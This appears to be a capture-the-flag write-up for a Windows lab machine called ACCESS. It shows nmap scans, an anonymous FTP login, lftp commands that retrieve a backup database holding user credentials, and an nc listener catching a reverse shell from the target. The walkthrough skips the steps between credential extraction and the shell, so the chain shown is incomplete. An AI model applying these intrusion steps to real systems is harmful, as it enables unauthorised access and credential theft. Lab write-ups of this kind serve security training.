A Windows machine where anonymous FTP access begins a credential chain — through a database file, an email archive, and a telnet session — ending with stored administrator credentials ready to leverage.
$ target=10.129.10.234; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target" Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-16 10:46 EST Nmap scan report for 10.129.10.234 Host is up (0.28s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 425 Cannot open data connection. | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet Microsoft Windows XP telnetd | telnet-ntlm-info: | Target_Name: ACCESS | NetBIOS_Domain_Name: ACCESS | NetBIOS_Computer_Name: ACCESS | DNS_Domain_Name: ACCESS | DNS_Computer_Name: ACCESS |_ Product_Version: 6.1.7600 80/tcp open http Microsoft IIS httpd 7.5 |_http-title: MegaCorp |_http-server-header: Microsoft-IIS/7.5 | http-methods: |_ Potentially risky methods: TRACE Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.84 seconds
Foothold
The web server didn’t expose anything useful.
FTP enumeration
Anonymous FTP login is allowed. The FTP root contains two directories: Backups and Engineer.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~] └─$ ftp 10.129.10.234 Connected to 10.129.10.234. 220 Microsoft FTP Service Name (10.129.10.234:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 425 Cannot open data connection. 200 PORT command successful. 150 Opening ASCII mode data connection. 08-23-18 08:16PM <DIR> Backups 08-24-18 09:00PM <DIR> Engineer 226 Transfer complete. ftp> exit 221 Goodbye.
Two files were discovered on the FTP server:
Engineer/Access Control.zip
Backups/backup.mdb
Downloading backup.mdb was unreliable due to network interruption, but Access Control.zip downloaded successfully.
1 2 3 4
ftp> cd Engineer ftp> ls 08-24-18 12:16AM 10870 Access Control.zip ftp> get Access\ Control.zip
To reliably retrieve the database, lftp was used with passive mode disabled and retries enabled:
1 2 3 4 5 6 7 8 9 10 11 12 13
$ rm -f backup.mdb lftp -u anonymous,anonymous ftp://10.129.10.234 -e " set ftp:passive-mode false; set ftp:use-epsv false; set net:timeout 20; set net:max-retries 20; cd /Backups; get -c backup.mdb; bye"
ftp:use-epsv: no such variable. Use `set -a' to look at all variables. cd ok, cwd=/Backups 5652480 bytes transferred in 21 seconds (262.0 KiB/s)
Extract credentials from backup.mdb
backup.mdb is a Microsoft Access database. Using mdbtools, the auth_user table revealed credentials for three users.
This produced a shell on the listener. The session landed in C:\Windows\system32>:
1 2 3 4 5 6 7
$ nc -lnvp 1234 listening on [any] 1234 ... connect to [10.10.16.103] from (UNKNOWN) [10.129.10.234] 49167 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Vaultex
Version 1.0
Theme repository
View the source code, report issues, and contribute to the theme on GitHub.